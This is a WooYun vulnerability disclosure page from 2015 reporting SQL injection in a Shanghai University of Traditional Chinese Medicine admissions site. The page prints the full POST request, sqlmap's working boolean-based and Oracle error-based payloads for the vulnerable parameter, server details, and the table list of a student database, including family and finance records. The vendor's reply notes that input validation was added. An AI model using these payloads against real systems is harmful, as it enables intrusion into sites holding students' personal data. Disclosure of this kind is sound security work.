上海中医药大学某站sql注入 | wooyun-2015-0159756| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159756

漏洞标题：上海中医药大学某站sql注入

漏洞作者：路人甲

提交时间：2015-12-10 11:07

修复时间：2016-01-25 18:01

公开时间：2016-01-25 18:01

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-10：细节已通知厂商并且等待厂商处理中
2015-12-14：厂商已经确认，细节仅向厂商公开
2015-12-24：细节向核心白帽子及相关领域专家公开
2016-01-03：细节向普通白帽子公开
2016-01-13：细节向实习白帽子公开
2016-01-25：细节向公众公开

简要描述：

详细说明：

http://ygzs.shutcm.edu.cn/  上海中医药大学阳光招生信息平台

POST /Pages/EnrolRegistUpGradeScore.aspx HTTP/1.1
Content-Length: 429
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ygzs.shutcm.edu.cn
Cookie: ASP.NET_SessionId=dzywts5rl2aqqidbfpvwlz5m; CNZZDATA1254023599=1912620956-1449309629-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1449309629; bdshare_firstime=1449310636107
Host: ygzs.shutcm.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-1&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKYoPnfBgK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8%2b4K2aAdHUn7sWQjApfH5/KQWD2geJ03DnGCoV5QDGbcFb0%3d&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWAgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZGRAMQgveRc08S8Pa8khCOyeKCo839CL2vVMzZPZNr%2bDIQ%3d%3d

txtCkbmh参数存在注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtCkbmh (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-2022' OR 5183=5183 AND 'HZWU'='HZWU&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKb0Zi6DwK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8+4Kkq1XaPXXQAhUQCaF0deJ50Ypwf2Bhx0+Jl/oDsZGFEM=&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWBgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZAIJDw8WBh4EVGV4dAU65rKh5pyJ5om+5Yiw5Lu75L2V5L+h5oGvIO+8jOivt+ajgOafpei+k+WFpeaYr+WQpuacieivr++8gR4JRm9yZUNvbG9yCo0BHgRfIVNCAgRkZAILDxYCHglpbm5lcmh0bWxlZGQAqWXWR+u78GVYRmFz/ymcaJDlj16CEj9bWaAh+75jNg==
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-1' AND 7827=CTXSYS.DRITHSX.SN(7827,(CHR(113)||CHR(113)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7827=7827) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(118)||CHR(113))) AND 'epVS'='epVS&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKb0Zi6DwK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8+4Kkq1XaPXXQAhUQCaF0deJ50Ypwf2Bhx0+Jl/oDsZGFEM=&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWBgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZAIJDw8WBh4EVGV4dAU65rKh5pyJ5om+5Yiw5Lu75L2V5L+h5oGvIO+8jOivt+ajgOafpei+k+WFpeaYr+WQpuacieivr++8gR4JRm9yZUNvbG9yCo0BHgRfIVNCAgRkZAILDxYCHglpbm5lcmh0bWxlZGQAqWXWR+u78GVYRmFz/ymcaJDlj16CEj9bWaAh+75jNg==
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 4.0.30128
back-end DBMS: Oracle
current user:    'XUEGONG'
current schema (equivalent to database on Oracle):    'XUEGONG'
current user is DBA:    False
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] XDB
[*] XUEGONG

Database: XUEGONG
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| LEAVESCHOOL_IMPORTDATA         | 66726   |
| XSPY_STUDENTAPPRISE_DETAIL     | 61996   |
| PROJECTQUALIFICATIONS          | 30016   |
| TBMESSAGE                      | 29935   |
| STUDENTUSER                    | 12453   |
| STUBASIC                       | 12450   |
| ENROLREGISTERDATA              | 12262   |
| STUFAMILY                      | 10962   |
| STUBASIC_SYNC                  | 10574   |
| STUBASICTEMP                   | 10019   |
| XSPY_STUDENTAPPRISE            | 8853    |
| STUFAMILYTEMP                  | 8395    |
| TIMETABLE                      | 6816    |
| TBLDORMSTU                     | 6324    |
| TBLDORMAPP                     | 5777    |
| PROJECTAPPLICATION             | 5533    |
| AWARDS                         | 3842    |
| STUXJYD                        | 3806    |
| TBPROVINCE                     | 3590    |
| STULEARNING                    | 3534    |
| STUFAMILYECOMSITUATION         | 2984    |
| TBLDORMROOM                    | 2396    |
| STUFAMILYECOMSITUATIONTEMP     | 2247    |
| NEWARRIVALBASIC                | 1849    |
| RECIPIENTS                     | 1626    |
| POSTGRADUATE_STUBASIC          | 1553    |
| LEAVESCHOOL_SUMMARY            | 1355    |
| TBLHYGIENE                     | 1324    |
| TBKNSAPP                       | 1083    |
| TBNEWKNSAPP                    | 982     |
| INFORMATION                    | 840     |
| NEWARRIVALDORMARR              | 800     |
| ENROLREGISTTAKINGCASESUMMER    | 729     |
| TBROLE_ROLEMENU                | 699     |
| TBKNSAPPHISTORY                | 658     |
| ENROLSCORE                     | 632     |
| TBATTENCECERT                  | 606     |
| STUSTAYEDREG                   | 495     |
| ENROLUSER                      | 429     |
| TBCLASSHISTORY                 | 414     |
| TBBBXSZSQ                      | 255     |
| TBROLE_ROLEUSER                | 241     |
| LEAVESCHOOL_BYHKQRREGIST       | 237     |
| TBTEACHERS                     | 224     |
| XSPY_APPRISE_ITEM              | 220     |
| TOURVISITED                    | 219     |
| TBCLASS                        | 154     |
| NEWARRIVALMASTER               | 149     |
| TUANWEI_GROUPRELATIONSHIP      | 144     |
| TBROLE_MENU                    | 140     |
| TBMAJORHISTORY                 | 137     |
| ENROLREGISTTAKINGCASE          | 136     |
| TUANWEI_ZB                     | 135     |
| ENROLUPGRADEDSCORE             | 134     |
| STUDENTMENUPERMISSION          | 133     |
| TBTRAINTICKETSAPP              | 133     |
| PROJECTCHARITYACTIVITIES       | 131     |
| STUDENTNAVPERMISSION           | 128     |
| STUBASIC_IMPORT                | 123     |
| TBLDORMFLOOR                   | 118     |
| TBLACTROOMAPP                  | 115     |
| TBLACTROOMPLAN                 | 109     |
| ENROLDETAIL                    | 98      |
| LEAVESCHOOL_BDZIMPORT          | 96      |
| PROJECTLEVEL                   | 90      |
| WORKFLOW_FLOW                  | 81      |
| STUDENTNAVMANAGE               | 78      |
| TBADMISSIONMAJOR               | 75      |
| ASKFORLEAVEAPP                 | 72      |
| TBDEPARTMENTHISTORY            | 69      |
| LEAVESCHOOL_STUDENT_SFZMATCH   | 62      |
| POSTGRADUATE_XY                | 61      |
| TBMZ                           | 58      |
| PROJECTTABLE                   | 55      |
| ENT                            | 53      |
| POSTGRADUATE_MAJOR             | 48      |
| JHSTUDENTLOAN                  | 41      |
| ENROLREGISTERFILE              | 39      |
| TBMAJOR                        | 39      |
| ENROLMENU                      | 36      |
| ACTIVITY                       | 32      |
| FDY_RECORDFORCONTACTSTUDENT    | 29      |
| TBATTENCECERTTEMP              | 27      |
| TBROLE_ROLEGROUP               | 26      |
| ENGLISHMAJOR                   | 24      |
| XUEKEANDZHUANYE                | 24      |
| WORKFLOW_FORM                  | 21      |
| TBLDORM                        | 17      |
| TBXHCONFIG                     | 17      |
| MATCHXH                        | 15      |
| TBDEPARTMENT                   | 15      |
| FDY_TRAINNINGRECORD            | 13      |
| TBTEACHERRYFL                  | 13      |
| TBZZMM                         | 13      |
| FDY_RECORDFORCONTACTFAMILY     | 11      |
| TBLACTROOM                     | 11      |
| APPLICATIONHISTORY             | 10      |
| FDY_BASICINFO                  | 10      |
| FDY_RECORDFORCONTACTTEACHER    | 10      |
| POSTGRADUATE_XL                | 10      |
| XSPY_ITEMS                     | 10      |
| ASKFORLEAVEAPPTEMP             | 9       |
| FDY_RECORDFORCLASSMEET         | 9       |
| LEAVESCHOOL_ITEM               | 9       |
| LEAVESCHOOL_PARAMETERS         | 9       |
| TBLREPAIRAPP                   | 9       |
| ENROLCONFIG                    | 8       |
| FDY_PUBLISHARTICLE             | 8       |
| POSTGRADUATE_TRAIN             | 8       |
| WORKFLOW_SETTINGS              | 8       |
| ENROLTHREESCHOOLSCORE          | 7       |
| FAMILYTYPE                     | 7       |
| FAMILYTYPETEMP                 | 7       |
| FDY_FDYAWARDS                  | 7       |
| FDY_RECORDFORVISITCLASSROOM    | 7       |
| POSTION                        | 7       |
| TBKNBZ                         | 7       |
| ENROLREGISTERTABLE             | 6       |
| ENROLTIMEPERIOD                | 6       |
| FDY_RECORDFOREXAMSUPERVISOR    | 6       |
| REGISTERPERIOD                 | 6       |
| ENROLBANNER                    | 5       |
| FDY_CLASSAWARDS                | 5       |
| TBPYFS                         | 5       |
| TBXL                           | 5       |
| TUANWEI_ZW                     | 5       |
| ENROLBBTYZ                     | 4       |
| FDY_APPLYFORCOURSE             | 4       |
| FDY_RECORDFOREDUCATIONACTIVITY | 3       |
| FDY_STUDENTAWARDS              | 3       |
| POSTGRADUATE_XSZ               | 3       |
| STUDENTFROMTYPEMANAGE          | 3       |
| TABLE_ZB                       | 3       |
| TBPARA                         | 3       |
| XSPY_APPRISE                   | 3       |
| FDY_RECORDFORVISITDORMATORY    | 2       |
| POSTIONHISTORY                 | 2       |
| TABLE_ZW                       | 2       |
| TBLOAN                         | 2       |
| CURRENTSEASON                  | 1       |
| FDY_RECORDFORSERIOUSEVENT      | 1       |
| FDY_TEACHSITUATION             | 1       |
| FDY_WORKIDEA                   | 1       |
| FDY_WORKSUMMARY                | 1       |
| NEWARRIVALMASTERCATEGORY       | 1       |
| TBQGPARA                       | 1       |
| TUANWEI_ROLE                   | 1       |
| WORKFLOW_TEMP                  | 1       |
| WORKLICENSE                    | 1       |
+--------------------------------+---------+

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-12-14 14:29

厂商回复：

专升本成绩查询中，身份证的文本框加了正则验证，以及其他文本框如春招报名号加了数字验证

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159756

漏洞标题：上海中医药大学某站sql注入

相关厂商：上海中医药大学

漏洞作者：路人甲

提交时间：2015-12-10 11:07

修复时间：2016-01-25 18:01

公开时间：2016-01-25 18:01

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159756

漏洞标题：上海中医药大学某站sql注入

相关厂商：上海中医药大学

漏洞作者： 路人甲

提交时间：2015-12-10 11:07

修复时间：2016-01-25 18:01

公开时间：2016-01-25 18:01

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0159756"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云